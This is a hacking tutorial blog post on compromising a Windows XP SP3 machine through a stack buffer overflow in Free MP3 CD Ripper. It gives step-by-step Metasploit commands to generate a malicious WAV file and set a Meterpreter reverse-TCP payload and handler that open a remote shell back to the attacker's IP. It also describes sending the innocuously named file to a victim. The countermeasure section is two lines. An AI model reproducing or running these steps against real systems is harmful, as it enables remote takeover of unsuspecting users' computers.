Hacking Windows XP SP3 via Free MP3 CD Ripper (WAV File) Stack Buffer Overflow

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R 1

Victim O.S : Windows XP SP 3

Vulnerable Application : Free MP3 CD Ripper 2.6.0.0

Exploit Credits : Richard Leahy, X-h4ck, Tiago Henriques

Actually this exploit already featured on exploit-db.com on August in this page http://www.exploit-db.com/exploits/17727/.

This module exploits a stack based buffer overflow found in Free MP3 CD Ripper 1.1.  The overflow is triggered when an unsuspecting user opens a malicious WAV file.

But what I will explain in this step by step tutorial by using this exploit as a metasploit module.

Requirement :

1. Free MP3 Ripper 2.6.0.0 (vulnerable application)

Mediafire.com

2. free mp3 ripper wav exploit (download link)

Mediafire.com

Step by Step :

Attacker IP Address : 192.168.8.90

Victim IP Address : 192.168.8.91

1. Download the required exploit above, and then copy to

cp free_mp3_ripper_wav.rb /pentest/exploits/framework/modules/exploits/windows/fileformat/

2. Open your console(CTRL + ALT + T) and type msfconsole to get in to your metasploit console box.

3. Use the exploit we've just downloaded and set the payload we want to use.

4. The next step after finish set up exploit and payload, we need to set up the available switch on this exploit. (fyi : every exploit and payload has its own switch to configure).

Information :

set filename Rock-n-Roll.wav --> give nice name to the vulnerable file

set lhost 192.168.8.90 --> attacker ip address

set lport 443 --> attacker port(if attack successfully launched, victim will make reverse connection to this port)

set target 0 --> Windows XP SP3

exploit --> Generate the vulnerable file

my vulnerable file(as you see on picture above) stored on /root/.msf4/local/Rock-n-Roll.wav

5. The next step you need to set up a metasploit handler to handle request from victim if they execute the exploit.

Information :

use exploit/multi/handler --> set up the metasploit handler

set payload windows/meterpreter/reverse_tcp --> set the payload the same with step 2

set lhost 192.168.8.90 --> set lhost the same with step 4

set lport 443 --> set lport te same with step 4

exploit --> start handler

6. After everything has been set up successfully, for the next step we need to send the malicious file to victim. If you try this tutorial on your own lab, you can follow my previous tutorial about how to easily sharing Backtrack files (view tutorial here).

The picture below was when victim opened malicious WAV file in their Windows XP SP3 computer.

7. As victim open our malicious file, our metasploit console got something interesting in it.

PWN3D!!

Countermeasure :

1. While I'm wrote this tutorial(10 Dec 2011) I still didn't find the newer version of this software

2. Use personal firewall to detect inbound and outbound traffic from your computer

Hope you enjoyed  🙂

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found it was useful: